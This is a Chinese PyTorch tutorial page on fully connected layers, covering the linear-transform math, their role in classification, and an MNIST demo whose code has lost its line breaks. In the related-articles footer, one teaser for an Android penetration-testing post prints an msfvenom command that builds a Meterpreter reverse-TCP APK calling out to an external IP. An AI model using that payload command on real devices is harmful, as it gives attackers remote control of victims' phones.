Pytorch深度学习框架实战教程-番外篇05-Pytorch全连接层概念定义、工作原理和作用

 相关文章 + 视频教程

《Pytorch深度学习框架实战教程01》《视频教程

Pytorch深度学习框架实战教程02:开发环境部署》《视频教程

Pytorch深度学习框架实战教程03:Tensor 的创建、属性、操作与转换详解》《视频教程

《Pytorch深度学习框架实战教程04:Pytorch数据集和数据导入器》《视频教程

《Pytorch深度学习框架实战教程05:Pytorch构建神经网络模型》《视频教程

《Pytorch深度学习框架实战教程06:Pytorch模型训练和评估》《视频教程

Pytorch深度学习框架实战教程09:模型的保存和加载》《视频教程》

《Pytorch深度学习框架实战教程10:模型推理和测试》《视频教程》

Pytorch深度学习框架实战教程-番外篇01-卷积神经网络概念定义、工作原理和作用

Pytorch深度学习框架实战教程-番外篇02-Pytorch池化层概念定义、工作原理和作用

Pytorch深度学习框架实战教程-番外篇03-什么是激活函数,激活函数的作用和常用激活函数

PyTorch 深度学习框架实战教程-番外篇04:卷积层详解与实战指南

Pytorch深度学习框架实战教程-番外篇05-Pytorch全连接层概念定义、工作原理和作用

Pytorch深度学习框架实战教程-番外篇06:Pytorch损失函数原理、类型和案例

Pytorch深度学习框架实战教程-番外篇10-PyTorch中的nn.Linear详解

引言

你是否好奇,当神经网络处理完图像特征后,最终是如何判断 "这是一只猫" 还是 "这是一只狗" 的?答案就藏在全连接层(Fully Connected Layer)里。作为神经网络的 "决策中心",全连接层承担着特征整合与最终预测的关键角色。本文将带你从底层原理到 PyTorch 实战,彻底搞懂全连接层的工作机制。

一、什么是全连接层?

全连接层(又称密集连接层,Dense Layer)是神经网络中最基础也最常用的层结构。其核心特征是:当前层的每个神经元与前一层的所有神经元完全连接,形成 "全连接" 的拓扑结构。

在 PyTorch 中,全连接层通过nn.Linear实现,它本质上是对输入特征执行线性变换(矩阵乘法 + 偏置),并可配合激活函数实现非线性映射。

二、全连接层的工作原理:从数学到直观理解

全连接层的工作过程可以拆解为两个核心步骤,我们用具体例子说明:

1. 线性变换:矩阵乘法的魔力

假设前一层输出的特征向量为x(形状为[in_features]),全连接层的计算过程为:

y = x · W + b

其中:

  • W是权重矩阵(形状为[out_features, in_features]),每个元素W[i][j]表示前层第j个神经元与当前层第i个神经元的连接强度;
  • b是偏置向量(形状为[out_features]),为每个输出神经元提供偏移量;
  • y是输出向量(形状为[out_features]),即线性变换的结果。

实例计算

若输入x = [x1, x2, x3](in_features=3),输出神经元数out_features=2,则:

y1 = x1×W11 + x2×W12 + x3×W13 + b1 

y2 = x1×W21 + x2×W22 + x3×W23 + b2

用矩阵表即为:

[ y1 ] = [ W11 W12 W13 ] [x1] + [b1] 

[ y2 ] [ W21 W22 W23 ] [x2] [b2]

[x3]

2. 非线性激活:突破线性限制

单纯的线性变换无法拟合复杂数据分布(多层线性变换等价于单层线性变换),因此全连接层通常会搭配激活函数(如 ReLU、Sigmoid):

y = σ(x · W + b)

激活函数为网络引入非线性能力,使其能学习复杂的特征映射关系。例如在分类任务中,输出层的全连接层会配合 Softmax 激活,将输出转换为类别概率分布。

三、全连接层的核心作用:从特征到决策

全连接层在神经网络中扮演着 "决策者" 的角色,主要有三大作用:

1. 特征整合:将局部特征 "串联" 成全局信息

在卷积神经网络(CNN)中,卷积层和池化层提取的是局部特征(如边缘、纹理、部件),而全连接层会将这些分散的局部特征整合为全局特征。例如:

  • 卷积层可能检测到 "猫的耳朵"" 猫的爪子 " 等局部特征;
  • 全连接层则将这些特征整合,判断 "这些特征组合起来是一只猫"。

2. 维度映射:将高维特征投影到目标空间

全连接层可以灵活调整特征维度,将前层输出的高维特征映射到目标维度:

  • 分类任务中,映射到[类别数]维度(如 10 类图像分类输出 10 维向量);
  • 回归任务中,映射到[1]维度(如预测房价输出单个数值);
  • 嵌入任务中,映射到指定维度的特征向量(如将文本映射到 128 维语义向量)。

3. 决策输出:直接产生可解释的预测结果

全连接层的输出通常具有明确的业务含义:

  • 分类问题中,输出向量经过 Softmax 后表示每个类别的概率;
  • 推荐系统中,输出表示用户对物品的偏好分数;
  • 自动驾驶中,输出表示转向角度、刹车力度等控制信号。

四、PyTorch 全连接层实战:从 API 到可视化

PyTorch 的nn.Linear是实现全连接层的核心 API,下面通过完整案例展示其用法。

1. nn.Linear核心参数解析

n.Linear(

in_features, # 输入特征维度

out_features, # 输出特征维度

bias=True # 是否添加偏置项(默认True)

)

  • 参数数量计算:总参数量 = in_features × out_features + out_features(权重矩阵 + 偏置向量);
  • 输入输出形状:输入[batch_size, *, in_features] → 输出[batch_size, *, out_features](*表示任意中间维度)。

2. 完整实战案例:MNIST 手写数字识别中的全连接层

我们将构建一个含全连接层的神经网络,用于 MNIST 手写数字分类,并可视化全连接层的特征转换过程。

import torchimport torch.nn as nnimport torchvision.datasets as datasetsimport torchvision.transforms as transformsimport matplotlib.pyplot as pltimport numpy as np# 1. 数据准备:加载MNIST数据集transform = transforms.Compose([transforms.ToTensor(), # 转为Tensor([1,28,28])transforms.Normalize((0.1307,), (0.3081,)) # MNIST标准化参数])# 加载测试集(仅用于演示)test_dataset = datasets.MNIST(root='./data', train=False, download=True, transform=transform)test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=16, shuffle=True)# 2. 定义含全连接层的神经网络class FCDemo(nn.Module):def __init__(self):super(FCDemo, self).__init__()# flatten:将28×28图像展平为784维向量# 第一个全连接层:784→128(降维并提取特征)self.fc1 = nn.Linear(28*28, 128)# 第二个全连接层:128→64(进一步整合特征)self.fc2 = nn.Linear(128, 64)# 输出层:64→10(10个数字类别)self.fc3 = nn.Linear(64, 10)# 激活函数self.relu = nn.ReLU()def forward(self, x, return_intermediate=False):# 展平图像:[batch, 1, 28, 28] → [batch, 784]x = x.view(x.size(0), -1)# 记录中间特征(用于可视化)x1 = self.relu(self.fc1(x)) # 第一个全连接层输出x2 = self.relu(self.fc2(x1)) # 第二个全连接层输出x3 = self.fc3(x2) # 输出层if return_intermediate:return x3, x1, x2 # 返回输出和中间特征return x3# 3. 初始化模型并加载预训练权重(模拟训练好的模型)model = FCDemo()# 为演示效果,随机初始化一个"看起来合理"的权重def init_weights(m):if isinstance(m, nn.Linear):nn.init.kaiming_normal_(m.weight, mode='fan_in', nonlinearity='relu')if m.bias is not None:nn.init.constant_(m.bias, 0)model.apply(init_weights)# 4. 可视化全连接层的特征转换过程def visualize_fc_transformations():# 获取一批测试数据images, labels = next(iter(test_loader))# 前向传播并获取中间特征outputs, x1, x2 = model(images, return_intermediate=True)# 取第一个样本进行可视化idx = 0img = images[idx].squeeze().numpy() # 原始图像feat1 = x1[idx].detach().numpy() # 第一个全连接层输出(128维)feat2 = x2[idx].detach().numpy() # 第二个全连接层输出(64维)pred = torch.argmax(outputs[idx]).item() # 预测结果plt.figure(figsize=(15, 5))# 子图1:原始图像plt.subplot(1, 3, 1)plt.title(f"Original Image (Label: {labels[idx]}, Pred: {pred})")plt.imshow(img, cmap='gray')plt.axis('off')# 子图2:第一个全连接层特征(128维)plt.subplot(1, 3, 2)plt.title("FC1 Output (128 features)")plt.bar(range(128), feat1)plt.xlabel("Feature Index")plt.ylabel("Activation Value")# 子图3:第二个全连接层特征(64维)plt.subplot(1, 3, 3)plt.title("FC2 Output (64 features)")plt.bar(range(64), feat2)plt.xlabel("Feature Index")plt.ylabel("Activation Value")plt.tight_layout()plt.show()# 5. 打印模型参数信息def print_model_params():print("模型参数详情:")for name, param in model.named_parameters():if 'weight' in name:print(f"{name}: 形状 {param.shape}, 参数量 {param.numel()}")elif 'bias' in name:print(f"{name}: 形状 {param.shape}, 参数量 {param.numel()}")total_params = sum(p.numel() for p in model.parameters())print(f"\n总参数量:{total_params}")# 执行可视化和参数打印if __name__ == "__main__":visualize_fc_transformations()print_model_params()

3. 代码解读与结果分析

  • 模型结构

输入图像(28×28)→ 展平为 784 维 → 全连接层 1(784→128)→ 全连接层 2(128→64)→ 输出层(64→10)。

每层全连接层后添加 ReLU 激活,引入非线性能力。

  • 参数计算
    • fc1:784×128 + 128 = 100480 个参数
    • fc2:128×64 + 64 = 8256 个参数
    • fc3:64×10 + 10 = 650 个参数

总参数量:100480 + 8256 + 650 = 109,386

  • 可视化结果

原始图像经过全连接层后,从 2D 像素矩阵逐步转换为 128 维、64 维的特征向量,最终映射到 10 维输出(对应 10 个数字的预测分数)。特征维度的降低过程,正是全连接层对信息的提炼与整合。

五、全连接层的优缺点与使用建议

优点:

  • 灵活性高:可任意调整输入输出维度,适配各种任务;
  • 解释性强:每个输出直接与所有输入相关,便于追溯特征影响;
  • 实现简单:仅需矩阵乘法,计算效率高。

缺点:

  • 参数量大:输入维度较高时(如 224×224 图像展平后有 50176 维),参数量会急剧增加,容易过拟合;
  • 缺乏局部感知:对图像等网格数据,忽视局部特征关联性(因此通常与卷积层配合使用)。

实用技巧:

  1. 降维使用:在高维输入(如图像)后使用时,逐步降低维度(如 784→128→64),避免参数量爆炸;
  1. 配合正则化:添加nn.Dropout(如nn.Dropout(0.5))减少过拟合;
  1. 最后使用:在 CNN 中通常放在网络末尾,用于最终决策而非特征提取。

六、总结

全连接层作为神经网络的 "决策中心",通过简单的矩阵乘法实现了从特征到预测的关键转换。它虽然结构简单,却在各种任务中发挥着不可替代的作用。理解全连接层的工作原理,不仅能帮助你更好地设计网络结构,更能加深对神经网络 "特征学习" 本质的认知。

下一篇文章,我们将探讨 "全连接层与卷积层的组合策略",告诉你如何设计更高效的神经网络架构。关注我,获取更多 PyTorch 实战干货!

互动话题:你在使用全连接层时遇到过哪些参数调优问题?欢迎在评论区分享你的经验~

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/pingmian/92726.shtml
繁体地址,请注明出处:http://hk.pswp.cn/pingmian/92726.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

生产环境中Spring Cloud Config高可用与动态刷新实战经验分享

生产环境中Spring Cloud Config高可用与动态刷新实战经验分享 一、业务场景描述 在微服务架构中,配置中心承担集中化管理各微服务配置的职责。随着服务实例数量增加,单点部署的Spring Cloud Config Server无法满足生产环境的高可用需求。同时&#xff0c…

华为服务器中Mindie镜像的部署及启动方法

一、部署方法 首先要安装好Docker,然后点开网址https://www.hiascend.com/developer/ascendhub/detail/af85b724a7e5469ebd7ea13c3439d48f 拉取镜像需要申请权限: 注册登录后,即可提交申请,一般需要一个工作日,等审核通过后,点击下载即可弹出如下提示框: 按照上述方法…

Unity基于Recoder的API写了一个随时录屏的工具

Tips: 需要有Recorder Package引用或存在在项目 using UnityEngine; using UnityEditor; using UnityEditor.Recorder; using UnityEditor.Recorder.Input; using System.IO; using System;public class RecorderWindow : EditorWindow {private RecorderController recorderCo…

安卓渗透基础(Metasploit)

生成payloadmsfvenom -p android/meterpreter/reverse_tcp LHOST106.53.xx.xx LPORT8080 -o C:\my_custom_shell.apkapksigner 是 Android SDK 中的一个工具,用于给 APK 文件签名,确保应用的完整性和安全性。进入 File > Settings > Appearance &a…

从零构建自定义Spring Boot Starter:打造你的专属开箱即用组件

一、引言:为什么需要自定义Spring Boot Starter Spring Boot的核心理念是"约定优于配置",而Starter(启动器)正是这一理念的最佳实践。官方提供的Starter(如spring-boot-starter-web、spring-boot-starter-data-jpa)通过封装常用组件的配置,让开发者能够"…

MySQL 基础操作教程

MySQL 是目前最流行的开源关系型数据库管理系统之一,广泛应用于Web开发、数据分析等场景。掌握基础的增删改查操作是入门的关键。本文将从环境准备开始,带你深入,mysql一、前置准备:安装与连接 MySQL 1. 安装 MySQL Windows&#…

批量把在线网络JSON文件(URL)转换成Excel工具 JSON to Excel by WTSolutions

产品介绍 JSON to Excel by WTSolutions 是一款功能强大的工具,能够将JSON数据快速转换为Excel格式。该工具提供两种使用方式:作为Microsoft Excel插件或作为在线网页应用,满足不同用户的需求。无论是处理简单的扁平JSON还是复杂的嵌套JSON结…

【排序算法】③直接选择排序

系列文章目录 第一篇:【排序算法】①直接插入排序-CSDN博客 第二篇:【排序算法】②希尔排序-CSDN博客 第三篇:【排序算法】③直接选择排序-CSDN博客 第四篇:【排序算法】④堆排序-CSDN博客 第五篇:【排序算法】⑤冒…

2024年ESWA SCI1区TOP,自适应种群分配和变异选择差分进化算法iDE-APAMS,深度解析+性能实测

目录1.摘要2.自适应种群分配和变异选择差分进化算法iDE-APAMS3.结果展示4.参考文献5.代码获取6.算法辅导应用定制读者交流1.摘要 为了提高差分进化算法(DE)在不同优化问题上的性能,本文提出了一种自适应种群分配和变异选择差分进化算法&…

目标检测数据集 - 无人机检测数据集下载「包含COCO、YOLO两种格式」

数据集介绍:无人机检测数据集,真实采集高质量含无人机图片数据,适用于空中飞行无人机的检测。数据标注标签包括 drone 无人机一个类别;适用实际项目应用:无人机检测项目,以及作为通用检测数据集场景数据的补…

Linux DNS服务解析原理与搭建

一、什么是DNSDNS 是域名服务 (Domain Name System) 的缩写,它是由解析器和域名服务器组成的。 域名服务器是指保存有该网络中所有主机的域名和对应IP地址, 并具有将域名转换为IP地址功能的服务器。 域名必须对应一个IP地址,而IP地址不一定有…

typecho博客设置浏览器标签页图标icon

修改浏览器标签页图标(favicon.ico):第1种:上传到服务器本地目录1、制作图标文件:准备一张长宽比为 1:1 的图片,将其上传到第三方 ico 生成网站,生成后缀为.ico 的图片文件,并将其命…

LoadBalancingSpi

本文是 Apache Ignite 中 Load Balancing SPI(负载均衡服务提供接口) 的核心说明,特别是其默认实现 RoundRobinLoadBalancingSpi 的工作原理。 它解释了 Ignite 如何在集群中智能地将任务(Job)分配到不同的节点上执行&…

Day43--动态规划--674. 最长连续递增序列,300. 最长递增子序列,718. 最长重复子数组

Day43–动态规划–674. 最长连续递增序列,300. 最长递增子序列,718. 最长重复子数组 674. 最长连续递增序列 方法:动态规划 思路: dp[i]含义:到i这个位置(包含i)的连续递增子序列的长度递推…

支持 UMD 自定义组件与版本控制:从 Schema 到动态渲染

源码 ⸻ 支持 UMD 自定义组件与版本控制:从 Schema 到动态渲染 在低代码平台或可视化大屏 SDK 中,支持用户上传自定义组件 是一个必备能力。 而在 React 场景下,自定义组件通常以 UMD 格式 打包并暴露为全局变量。 本篇文章,我…

zookeeper3.8.4安装以及客户端C++api编译

服务端直接下载编译好的bin版本 Apache Download Mirrors C客户端需要编译库文件 zookeeper 3.8.4 使用与C API编译 - 丘狸尾 - 博客园 杂七杂八的依赖 sudo apt update sudo apt install -y \autoconf automake libtool libtool-bin m4 pkg-config gettext \cmake build-es…

使用行为树控制机器人(一) —— 节点

文章目录一、背景需求二、创建ActionNodes1. 功能实现1.1 头文件定义1.2 源文件实现1.3 main文件实现1.4 my_tree.xml 实现2. 执行结果三、 执行失败处理1. 添加尝试次数1.1 功能实现1.2 实验结果2. 完善异常处理2.1 多节点组合兜底2.2 实验结果使用行为树控制机器人(一) —— …

JavaScript Window Location

JavaScript Window Location JavaScript中的window.location对象是操作浏览器地址栏URL的一个非常有用的对象。它允许开发者获取当前页面的URL、查询字符串、路径等,并且可以修改它们来导航到不同的页面。以下是关于window.location的详细解析。 1. window.location…

Kubernetes生产环境健康检查自动化指南

核心脚本功能: 一键检查集群核心组件状态自动化扫描节点/Pod异常存储与网络关键指标检测风险分级输出(红/黄/绿标识)一、自动化巡检脚本 (k8s-health-check.sh) #!/bin/bash # Desc: Kubernetes全维度健康检查脚本 # 执行要求:kub…